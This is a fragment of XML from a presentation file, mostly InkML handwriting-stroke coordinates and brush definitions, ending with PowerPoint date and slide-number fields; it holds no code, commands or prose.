0,24-8 415,-3 4-415,40-9 915,-14 3-915,24-4 0,0 0 0,4 1 1204,-3 0-1204,7 3 0,-7-7 0,3 7 0,-4-3 0,0 0 0,-4 3 0,3-8 0,-3 8 0,4-7 0,0 7 0,0-7 0,0 3 0,0-4 0,4 4 0,-3-3 0,3 3 0,0 0 0,-3-3 0,3 3 0,-4-4 0,20-12 0,4-1 0,62-41 0,-32 24 0,32-21 0,-37 17 0,-12 15 0,6-19 0,-16 22 0,-2-9 0,-3 11 0,-8 1 0,3 4 0,-7 0 0,3 0 0,0 0 0,1 0 0,-1 0 0,4-4 0,-3 3 0,4-7 0,0 7 0,0-3 0,0 4 0,0 0 0,-5 0 0,8 4 0,-10-3 0,10 3 0,-7 0 0,0-3 0,3 7 0,-7-3 0,3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32:25.166"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'9'5'0,"0"3"0,11-2 0,3 4 0,37 13 0,4 2 0,5 2 0,-14-5 0,0 0-516,18 6 0,0-2 516,16 0 0,-35-11 0,-2-1 0,15 2 253,6 5-253,-60-17 0,0 0 0,-3-3 0,7 6 0,4-1 779,6 10-779,19 7 0,7 2 0,24 11 0,-10-4 0,-2-3 0,-5-4 0,25 9 0,-63-26 0,20 5 0,-38-18 0,-4 0 0,0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34:15.203"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 16274,'47'21'0,"-5"-6"3614,22 4-3614,-24-8 0,-8-10 0,8 3 0,23 4 0,17 2 0,13 9 0,0-9 0,0 6 207,-40-10 0,0-1-207,43 14 0,-3-8 0,-42-7 0,1 0 488,2 1 1,1 0-489,15 1 0,-1 0 0,-13 0 0,1 0 596,21 5 0,-1-2-596,-24-8 0,-3 0 0,1 4 0,1 0 0,3-4 0,0-2 0,34 1 0,-27 5 0,2-1 0,4-3 0,0 1 0,-12 6 0,-3 1-224,27-2 224,19 2 0,-42 3 0,-6-7 0,1 0 0,15 12 0,22 1 0,-35-9 846,6 4-846,-26-12 0,0 4 0,39-5 0,-16 0 0,20 0 1233,-30 0-1233,-20 0 249,-2 0-249,-7 0 0,7 0 0,-5 0 0,12 5 0,-13-3 0,6 7 0,-11-8 0,10 8 0,-8-4 0,16 1 0,-5 3 0,20-1 0,4-1 0,12 7 0,1-12 0,-21 9 0,15-10 0,-14 3 0,6-4 0,4-1 0,5 2 0,30 8-421,-28-8 1,1 0 420,-9 4 0,-3-1 0,17-4 0,9-7 0,1-3 0,-10 1-78,22-8 78,-22 15 0,23-6-365,-37 7 1,0 2 364,33-1 0,-27 3 0,-2 2 0,10 4 0,23 9 0,-23-9 0,22 8 0,4-6 0,3-1 0,-3 6 0,-16-14-132,-14 5 132,14-7 0,-10-7 0,-17 7 0,3-2 0,30-13 84,-12 14 0,3 0-84,-16-8 0,0 0-684,9 8 0,2 0 684,11-4 0,-1 1 0,-20 4 0,1 0 0,26-1 0,3 2-798,-7 3 1,1 2 797,9 0 0,2 1 0,-2 4 0,1 1 0,-25-1 0,2 1 0,-3-1 0,21 2 0,-4-1 0,-5 0 0,-2-1-346,-2 0 0,-5-3 346,26 3 0,-3 7 0,-16-1 510,-14-8-510,-12 3 1297,-4-11-1297,0 11 0,4-10 0,38 5 0,-39-7 0,11 0 0,2 0 0,3 0 0,-6 0 0,-1 0 0,8 0 0,19 0 0,-32 7 0,36-5 2432,3 14-2432,-10-7 0,-23 1 0,-4 0 0,-11-1 1028,15 0-1028,-52-9 0,-7 0 0,-2-8 0,-8 6 0,0-10 0,0 11 0,-4-7 0,3 3 0,-7 0 0,3-3 0,-11 2 0,-2-4 0,4 0 0,-21-11 0,4 0 0,-23-11 0,19 10 0,-1 7 0,25 7 0,-1 3 0,8 0 0,4-3 0,0 3 0,-4-4 0,-1 0 0,-4-4 0,-8 2 0,11 1 0,-10 1 0,15 8 0,-3-3 0,8 8 0,-3 1 0,3 0 0,-4-5 0,4 3 0,1-6 0,4 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34:16.528"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1029 9 24575,'-3'-5'0,"-3"1"0,-19 4 0,-2 0 0,-21 0 0,-2 0 0,-40 9 0,-6-6-684,36 1 0,-3 1 684,3-5 0,-2 0 0,-6 4 0,0 1 0,11 0 0,2 1 0,-39 6-270,41-4 270,28-8 0,15 0 0,2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34:54.422"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5943 975 24575,'-91'-12'0,"-1"0"0,1-1 0,-1 1 0,12 0 0,-1 0 0,6 1 0,9 0 0,-3-2 0,10 1 0,-19-4 0,17 2 0,11 5 0,-1-5 0,-9-2 0,9 9 0,1-5 0,-11 4 0,11 1 0,-1-5 0,-35 1 0,2-5 0,24 6 0,-2-1-435,7 1 1,1 1 434,-7 3 0,2 1 0,-24-11 0,32 15 0,-1 0 0,-41-15 0,10 14 0,30-7 0,3 1 0,3 5-194,-24-5 194,27 1 0,-19 5 0,12-10 0,-35 11 0,49-4 861,-27 5-861,38-5 202,-1 3-202,-7-3 0,7 5 0,-5 0 0,5-5 0,-21 4 0,-15-12 0,-17 2 0,-13 1 0,26 0 0,1 1 0,-11 7 0,12-3 0,4 0 0,20 0 0,-45 3 0,26-5 0,0-1 0,-33-2-813,20-3 0,3-3 813,3-2 0,-23-17-411,37 24 411,4-7 0,-2 1 0,-19 4 0,17-1 0,0-1 0,-27-2 0,16 7 0,17 3 0,-1 7 0,11-5 0,-10-2 0,12 1 0,1-4 1591,0 9-1591,0-5 446,0 6-446,0-5 0,7 4 0,-19-4 0,16 0 0,-18 4 0,14-4 0,7 5 0,6 0 0,4 0 0,7-4 0,-3 3 0,4-3 0,0 4 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-4 0,0 3 0,-4-7 0,-1 7 0,0-3 0,-3 4 0,7 0 0,-3 0 0,4-4 0,0 3 0,0-3 0,0 0 0,0-1 0,-24-8 0,18 4 0,-19 1 0,25 4 0,0 0 0,-4-1 0,3 0 0,-3-4 0,4 8 0,0-3 0,4 0 0,-3 3 0,-1-7 0,-5-1 0,-11-2 0,5-2 0,-12 2 0,5 1 0,0-1 0,6 5 0,8 2 0,8 8 0,1 5 0,4 5 0,0 11 0,4-5 0,-4 12 0,9-5 0,-3-1 0,0 0 0,2-13 0,-8 0 0,12 0 0,0 8 0,9 6 0,-4 0 0,-6-6 0,-3-12 0,-4-5 0,5-4 0,-4 4 0,-1 1 0,-4 3 0,8 5 0,-6-3 0,10 3 0,-11-4 0,3 0 0,0-4 0,-3 3 0,7 0 0,-7 2 0,7 3 0,-7-4 0,2-8 0,-3-6 0,-24-34 0,17 22 0,-17-16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34:56.475"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 111 24575,'27'-5'0,"-2"1"0,0 4 0,1 0 0,9 0 0,-1-5 0,-8 3 0,7-3 0,-14 5 0,6-4 0,-11 3 0,-1-3 0,-4 4 0,4 0 0,1 0 0,0 0 0,2 0 0,-6 0 0,3 0 0,-4-4 0,0-1 0,0 0 0,-1-3 0,1 7 0,0-3 0,0 4 0,0 0 0,0-4 0,0-1 0,-1 0 0,-3-3 0,-1 3 0,0 0 0,1 1 0,4 4 0,4 0 0,1 0 0,4 0 0,-1 0 0,1 0 0,0-4 0,0 3 0,-4-7 0,-1 7 0,-4-3 0,-4 4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36:09.387"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">394 1 24575,'0'14'0,"0"-2"0,0-3 0,-4 0 0,3 4 0,-7-3 0,2 14 0,-3-9 0,-5 11 0,3-1 0,-6-6 0,-1 13 0,-2-5 0,-14 13 0,14-15 0,-10 5 0,19-9 0,-9 6 0,9 0 0,-6 5 0,7-5 0,-10 20 0,6-10 0,-2 23 0,6-22 0,5 2 0,-6-8 0,6-12 0,-5 5 0,5-8 0,0 8 0,-4 2 0,1 20 0,1 17 0,0 3 0,7 22 0,0 4 0,0 4 0,0-25 0,0 13 0,7-39 0,5 18 0,5-4 0,-1-23 0,7 24 0,10 2 0,2 4 0,7 9 0,-16-32 0,4 14 0,6-10 0,-8-4 0,24 25 0,-5-20 0,7 13 0,-12-19 0,2 0 0,-31-26 0,17 14 0,-14-6 0,27 12 0,-14-1 0,22 3 0,-27-7 0,1-10 0,-5-1 0,5-2 0,8 9 0,16 2 0,0 15 0,26 0 0,-10 7 0,-20-24 0,0-1 0,27 18 0,-27-18 0,0 0 0,26 18 0,-26-22 0,1 1 0,39 21 0,-26-20 0,26 1 0,-38-6 0,42 8-1080,-9 7 1080,-22-19 0,3-2 0,-4 0 0,-1 0 0,5 1 0,1-2 0,-2-6 0,-1-1 0,24 18 0,-21-17 0,5-3 0,-5 1 0,2 0 0,13 5 0,1-1 0,-15-7 0,0-2 0,15 5 0,0 0 0,-19 0 0,-2 0 0,6-4 0,0 0-256,-4 3 1,-2 2 255,23 2 0,-14-6 0,8 6 0,-37-8 0,23 0 1052,-9 0-1052,-8 0 0,28 0 0,-24 0 0,16 0 0,3 0 0,-2 0 0,-1 0 0,0 0-149,3 0 149,-7-4 0,2-2 0,38 4 0,-39-7 0,0 0 0,-6 8 0,-2 0 0,18-7 0,29 16 0,-58-6 0,12 6 0,-21-3 0,-5 1 0,7 6 0,-7-2 0,18-4 688,-26-2-688,51-4 0,-27 0 0,13 0 0,3-7 0,-29 5 0,30-5 0,-10 7 0,1-5 0,9 4 0,-30-5 0,55 6 0,-36-7 0,41-2 0,-47 1 0,-5 0 0,-28 4 0,-2-1 0,-8-4 0,0 0 0,0 0 0,0 0 0,-8 0 0,2-4 0,-7 3 0,0 1 0,-8-5 0,1 8 0,-5-10 0,7 7 0,-7-1 0,9 5 0,-8-4 0,3-2 0,-6-1 0,0-3 0,1 9 0,8-2 0,4 3 0,1 0 0,4 1 0,4 0 0,-3 3 0,3-3 0,-4 0 0,-4 3 0,3-7 0,-3 7 0,4-3 0,0 4 0,0 0 0,0 0 0,0 0 0,4-4 0,-7-1 0,-5-6 0,-10 6 0,0 0 0,2 5 0,7-4 0,4 3 0,1-3 0,0 4 0,3 0 0,1-4 0,5 7 0,4-2 0,4 4 0,-3-1 0,3-4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36:11.276"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">571 1 24575,'-18'0'0,"0"4"0,0 5 0,0 1 0,-7 4 0,-2-4 0,0-4 0,-6 4 0,14-9 0,-7 8 0,12-8 0,1 7 0,4-7 0,0 3 0,0 0 0,0-3 0,0 7 0,0-3 0,0 4 0,4-1 0,-3 1 0,3 0 0,-4 0 0,0 0 0,-4 0 0,3 0 0,-3-4 0,4 2 0,0-6 0,4 7 0,-3-7 0,3 3 0,0 0 0,-3 1 0,3 4 0,0 0 0,-3 0 0,7-1 0,-7-3 0,7 3 0,-7-3 0,3 4 0,-4 0 0,0 0 0,-4 0 0,7-1 0,-6 1 0,7-4 0,-4-1 0,4 0 0,1 1 0,4 4 0,-4-4 0,-1-1 0,0 0 0,1 1 0,4 3 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-4 0,0-1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41:47.255"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'39'0,"0"25"0,0-10 0,9 2 0,2 4 0,-6-12 0,3 3-328,11 15 0,5 9 0,0-1 0,-7-5 0,-1 0 0,4 2 0,10 18 0,4 3 0,-3-2 172,-8-13 1,-4-2 0,3 2-173,9 11 0,2 2 0,-4-7-164,-5-4 0,0-2 164,0-9 0,3 4 0,0 0 0,-4 2 0,0 0 0,0-4 43,6 11 0,1 1 285,-4-4 0,1 6 0,-1-5 0,4 13 0,-3-5 0,-4-14 0,1 3 0,-2 0 0,2 5 0,-4-10 0,-6-22 0,-1-2 0,9 38 0,0-4-984,7-11 521,-9 23 1446,2-37-904,-10-26 904,-7-26 0,4-28 0,-7-1 0,3-30-738,-5 17 1,0 6 0,0 17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8:39:29.997"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'7'14'0,"0"0"0,1 6 0,0 1 0,1 6 0,0-1 0,1 11 0,-1-8 0,-2 0 0,-3-5 0,-4-12 0,0 14 0,0-11 0,0 10 0,0-4 0,0-3 0,0-2 0,0-9 0,0 3 0,3 1 0,2 8 0,-1-6 0,3 5 0,-3-13 0,-1-2 0,1-7 0,-4-6 0,0-1 0,3 0 0,-3-2 0,3 5 0,-3-2 0,0 6 0,0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41:48.389"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1215 0 24575,'-44'36'0,"-9"11"0,-8 1 0,-3 2 0,25-17 0,-4 3-246,-15 13 0,-12 12 0,-1 1 0,10-10-246,2-5 0,4-1 164,-1 7 0,-5 6 0,2-1 0,-1-4 0,2-1 0,9-1 433,17 7 1,2-2-106,-36 10 0,11-5 0,45-4 0,10-57 0,1-1 983,51-59 0,-32 36 0,34-40-207,-37 54-776,-3 0 0,-4 4 0,-2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41:49.596"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'65'47'0,"-4"-10"0,-20-6 0,4 3 0,4-4 0,12 3 0,2 0 0,17 7 0,10 5 0,1 0 0,-6-3 0,-14-7-328,-7-2 0,-9-5 0,9 4 131,19 7 0,20 7 1,1 1-1,-18-8 0,-35-16-787,-38-15 0,0-7 0,-4 7 0,-4-3 104,3 8 880,-3-3 0,0 2 245,9 9 1,-12-14 0,8 8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46:30.330"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'19'31'0,"-5"-6"0,3 0 0,-1 6 0,3-1 0,-2 7 0,3-1 0,-10-6 0,13 17 0,-12-18 0,7 18 0,1 13 0,1-5 0,-3-1 0,17 23 0,-25-46 0,19 37 0,-12-31 0,-5-8 0,4 2 0,-11-14 0,3-4 0,-4-2 0,4 3 0,0-3 0,-3-1 0,2 0 0,-5-2 0,5 2 0,-2 0 0,0 1 0,2 3 0,-2 0 0,0 0 0,5 0 0,-7-4 0,7 0 0,-8 1 0,6 5 0,-3-1 0,4 5 0,3 0 0,-2 1 0,8 5 0,-8-5 0,3-1 0,-5-9 0,-3-1 0,-1-3 0,5 9 0,-2 1 0,14 20 0,-8 3 0,4-1 0,-1-2 0,-6-16 0,2-1 0,-4-9 0,-3-1 0,-1-3 0,-3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46:31.458"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">310 0 24575,'-29'45'0,"4"-10"0,-9 33 0,7-13 0,5-10 0,-2 3 0,-15 38 0,8-21 0,-4 13 0,25-52 0,-8 19 0,11-29 0,2 3 0,2-8 0,3-1 0,3 0 0,-2-2 0,2 2 0,-3-3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9:46:32.648"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 28 24575,'20'-15'0,"-2"5"0,-14 7 0,3 3 0,6 0 0,4 4 0,59 21 0,-16-9 0,-9-3 0,2-1 0,30 2 0,2-5 0,11 0 0,0 5 0,-31-13 0,23 6 0,-23-7 0,10 0 0,-15 0 0,-29 0 0,-17 0 0,-8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8:39:30.775"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 284 24575,'3'-8'0,"4"-2"0,3 3 0,20-3 0,8-17 0,23 4 0,5-13 0,7 13 0,-26 6 0,40 2 0,-25 3 0,34-11 0,-24 7 0,-22-2 0,-19 8 0,-17 2 0,-8 1 0,-6 0 0,0 3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8:39:32.840"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3090 1 24575,'0'24'0,"-4"25"0,-15 8 0,-5 29-1228,5-29 1,-4 2 1227,-2-6 0,0-2 0,4-3 0,-1 1 0,-9 5 0,-3-2 0,-15 29 0,16-30 0,-2 1 0,8-9 0,-2 0 0,-13 9 0,1-3 0,-7 14 154,11-18 1,1-2-155,-5 6 0,-9 9 0,4 7 0,-10-6 0,10 13 0,-6 4 0,8-1 0,-2 8 0,16-36 0,0-4 0,-5 8 0,-10 11 0,30-47 514,-2 11-514,2-11 0,2 5 0,-10 4 1243,4-6-1243,-7 7 389,-4 1-389,7-8 0,-8 9 0,4-9 0,-10 3 0,-13 9 0,-2-3 0,-12 14 0,3-12 0,1 13 0,-5-5 0,10-2 0,12-9 0,12-7 0,11-11 0,6 2 0,3 0 0,-11 2 0,9-1 0,-16 1 0,14-5 0,-21 3 0,-8 14 0,-9-8 0,-7 16 0,-10-17 0,15 3 0,-26 4 0,29-8 0,-8 11 0,29-16 0,-14 7 0,24-6 0,-16 1 0,16 1 0,5-4 0,2-1 0,3 0 0,-3-3 0,-6 3 0,5-6 0,-5 2 0,0 1 0,5-3 0,-10 3 0,9-1 0,-31 4 0,20 1 0,-22-1 0,22 0 0,6-2 0,1 2 0,9-3 0,4 2 0,4-8 0,3 1 0,3-9 0,2-7 0,-1 5 0,11-23 0,-8 15 0,13-17 0,-9-1 0,6 9 0,-5-8 0,5-6 0,-11 18 0,6-5 0,-11 20 0,2 9 0,-3-2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8:39:34.248"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'14'18'0,"10"9"0,12 9 0,-6-6 0,0 0 0,-17-20 0,-5-3 0,2-3 0,-6 2 0,2-5 0,-2 8 0,3-4 0,0 2 0,0-1 0,0-5 0,-3 5 0,-1-2 0,0 3 0,1 3 0,3 1 0,-1 0 0,1 2 0,0-9 0,-3 6 0,-1-7 0,0 1 0,1-1 0,0 1 0,-1-1 0,-3 4 0,3 0 0,-2 0 0,5-3 0,-2 2 0,3-5 0,-3-4 0,-1-11 0,-3 5 0,0-3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8:39:37.586"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">16824 0 24575,'0'22'0,"-3"0"0,3 5 0,-4-4 0,4 24 0,-6 3 0,4 23 0,-12 23 0,5-3 0,0 7 0,-1-22 0,0 5-841,4-10 1,-1 10 0,0 0-1,1-9 841,-4 11 0,2-4 0,2-3 0,0 4 0,-1-7 0,-6-8 0,0-2 0,4 12 0,-1 0 0,-2-15 0,-1 1 0,0 23 0,2-2 0,1 13 0,-2-20 0,1 2 0,7-25 0,-2 4 0,-2 10 0,-3 14 0,-1 3 0,0-10 0,-3 17 0,-2 1-777,3-5 1,-2 12-1,-1 0 1,0-15 776,-5-6 0,-3 0 0,4-2 0,-2 12 0,-2 2 0,1-7 0,-3-4 0,1-6 0,-5 11 0,4-11 0,-3 10 0,-3 4 0,1 1 0,0-4 0,3-10 0,-6 15 0,1-9 0,-1 3 0,0-1 0,-3 6 0,2-5 0,5-18 0,-12 15 1477,1-3-1477,20-42 0,-6 10 0,9-16 0,5-16 0,-12 5 3435,3-6-3435,-20 10 1556,19-14-1556,-44 27 0,-8 4 0,18-10-822,-25 17 0,-6 3 822,40-24 0,2-1 0,-11 9 0,-1 1 0,-1 0 0,-3 0 0,-24 10 0,0-3 0,30-12 0,-1-3 0,-35 2 0,3-7 0,-1-8 0,-4-14 0,14 0 0,-1-6 0,-7-2 0,14 3 0,-1-2-605,7 0 0,-4-1 0,5 0 605,-10-1 0,5 0 0,17 0 0,1 1 742,-6 0 1,-5-1-743,-10-2 0,-7-1 0,6 2 0,7 3 0,0 1 0,-15-5 0,-8 0 0,15 3 0,-3 6 0,29-1 0,2 0 0,-13-4 0,5 6 0,-1 1 0,-25-7 0,20 4 0,-1 0 0,-32-6 0,7 2 0,17-1 0,-5 8 0,21 8 0,-3 2 0,6-2 0,-1 2-497,-13 3 1,-1 1 496,9 2 0,6 0 0,-6 2-177,0-4 0,0-3 177,3-1 1830,-27-2-1830,14-8 0,-15 0 0,17 0 0,-14 0 0,42 0 0,-17 0 0,-16 0 0,-16 0 0,-7 0-849,40-1 1,-2 2 848,-12 6 0,-3 3 0,-12 0 0,-1 1 0,7 3 0,0 0-710,-15 4 1,-1 0 709,9-3 0,0-1 0,-10 1 0,-2 0 0,6 0 0,-3-3 0,17-7 0,-4-2 0,6-1 0,1 3 0,-3-2 0,-16-3 0,-11-2 0,7-1 0,0-2 0,4 0 0,22 2 0,-2 2 0,3-3 0,-24-8 0,8-1 0,36 8 0,1 0-288,-11-7 1,-2-1 287,3 0 0,0 1 0,-6-2 0,-3 0 0,-3-4 0,2 1 0,16 3 0,-1 1 0,-23-1 0,0 3 0,25 7 0,-3-1 0,-9-1 0,-7-2 0,6 0 0,5-1 0,2 0 289,-16-2 0,1-3-289,25-1 0,2 0 0,-5 1 0,-2 2 0,1 0 0,-3-2 0,-13-6 0,-2-1 0,4 5 0,-1 2 0,2 0 0,0-1 0,-5-2 0,5 3 0,-15 4 0,21-9 0,-2-2 0,13 8 0,-1-1 0,-9-10 0,-4-2 0,-17 5 0,-2-1 0,14-3 0,-1-2 0,-14 2 0,1-1 0,9-5 0,3 0 0,8 8 0,3 0 0,4 2 0,3 1 0,-31-9 0,31 11 2400,-6-2-2400,15-9 1078,-18 12-1078,15-8 0,-2 13 0,22-1 1126,8 7-1126,-1-1 0,8 3 0,0 4 0,-3-7 0,-2 3 0,-5-9 0,-6 0 0,-31-19 0,3 6 0,10 4 0,-3-2-936,-27-14 936,-9-1 0,38 17 0,-1-1 0,-41-17 0,26 15 0,-3-2-1037,-1-3 1,-1 0 1036,-10 1 0,-1 1 0,5 1 0,1 0 0,1 1 0,2 1 0,8 7 0,2 0 0,4 1 0,1 1 0,6 0 0,0 2 0,-35-3 0,21-9 0,12 9 0,2-2 0,19 6 837,-11-1-837,21 5 2172,-3 1-2172,14 2 0,-2 5 0,3-5 0,-3 2 0,-1-3 0,0 0 0,-8-1 0,1-4 0,-29-13 0,0-5 0,-4-3 0,4 6 0,-1 1-491,-12-9 0,-1 2 491,8 8 0,3 3 0,-18-8-153,11 9 0,2 1 153,-2-6 0,-24 8 0,47 4 0,7 10 0,14-3 0,-4-1 0,-14-2 967,-9 0-967,-20-4 321,18 3-321,-36-4 0,13 2 0,0 1 0,7-1 0,37 8 0,8-2 0,9 3 0,8 0 0,3 1 0,-3 10 0,-1 6 0,-3 18 0,0-2 0,0 19 0,0-25 0,0 13 0,0-15 0,0 16 0,0-17 0,0 15 0,0-17 0,-3 3 0,2-2 0,-2-5 0,3-3 0,-3-1 0,2-3 0,-2 3 0,6 1 0,-2 9 0,6 1 0,-6 16 0,3-8 0,-1 2 0,-2-14 0,2-7 0,-3-3 0,0-7 0,3-7 0,1-5 0,6-5 0,-6 9 0,3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8:39:38.623"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 324 24575,'24'-8'0,"0"-4"0,23-7 0,26-7 0,15-5 0,-40 15 0,0 0 0,35-14 0,0-8 0,-34 17 0,7-9 0,-40 18 0,3 0 0,-8-2 0,-4 7 0,-1-4 0,-5 4 0,5 3 0,-5-2 0,-1 5 0,-1-2 0,-2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1T18:53:09.655"/>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1 109 16383,'78'0'0,"-6"0"0,-12 0 0,-7 0 0,17 0 0,3 0 0,23 0 0,2 0 0,-45 0 0,0 0 0,1 0 0,-2 0 0,47 0 0,-46 0 0,0 0 0,0-1 0,0 2 0,45 6 0,-39-6 0,-1 0 0,30 6 0,-32-7 0,2 0 0,-4 3 0,1 2 0,6-5 0,0 2 0,38 5 0,-38-7 0,-1 0 0,31 8 0,-37-7 0,1 0 0,4 3 0,-4-1 0,13-3 0,23 0 0,-39 0 0,8 0 0,-10 0 0,-16 0 0,1 0 0,-14 0 0,6 0 0,10 0 0,-8 0 0,28 0 0,-4 0 0,19 0 0,-9 0 0,7 0 0,3 0 0,-18 0 0,23 0 0,-36-5 0,49-4 0,-34 1 0,13 1 0,-22 1 0,-25 5 0,13-5 0,-15 6 0,5 0 0,23 0 0,4-13 0,11-1 0,27-17 0,-34 11 0,-7 10 0,1 3 0,25-6 0,19 12 0,-42-3 0,0 0 0,46 4 0,-46 0 0,0 0 0,43 0 0,0 7 0,-11-5 0,-12 5 0,-23-7 0,-14 0 0,-9 4 0,0 1 0,6 7 0,-5-2 0,5 2 0,-7-4 0,22 10 0,4-4 0,31 7 0,2-5 0,11-7 0,-43-2 0,0 0 0,46-5 0,-45 2 0,-2 0 0,23-4 0,16 0 0,-16 0 0,11 0 0,-35-1 0,1 2 0,36 13 0,8-11 0,-2 19 0,-29-15 0,25 1 0,-25 4 0,-9-10 0,2-2 0,33-1 0,-38-2 0,0-2 0,41-11 0,-19 8 0,8 1 0,-10 0 0,-11 6 0,9-19 0,-9 17 0,11-17 0,10 19 0,-8-6 0,-2 7 0,-3 7 0,3-6 0,2 12 0,8-11 0,-30 4 0,0 1 0,27-6 0,-21 3 0,-2-1 0,8-9 0,15 5 0,-17-5 0,-1 6 0,9 0 0,1 0 0,14 0 0,10 0 0,-1 7 0,-42-6 0,1 0 0,44 6 0,-45-6 0,0-2 0,43-6 0,-43 3 0,0-1 0,45-12 0,-13 5 0,0 0 0,-35 3 0,1 1 0,38-2 0,0 3 0,-37 3 0,-3 1 0,5 6 0,1 1 0,2 0 0,0 1 0,-3 3 0,1 0 0,6 1 0,-1-1 0,39 2 0,-37-5 0,-2-2 0,20-3 0,-21 0 0,-1 0 0,7 0 0,-8-4 0,-8-1 0,-17 0 0,11 1 0,-26 4 0,5 0 0,7 0 0,-2 0 0,8 4 0,-14-3 0,22 3 0,-2 1 0,25-4 0,7 5 0,2-6 0,-2 0 0,-13 0 0,-20 4 0,-4-3 0,-18 3 0,-2-4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7250E-0EEC-3342-BAA1-2161A6B2A476}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/22/21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9F8A5-8FD6-EA4C-8C10-4D7FB5642262}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
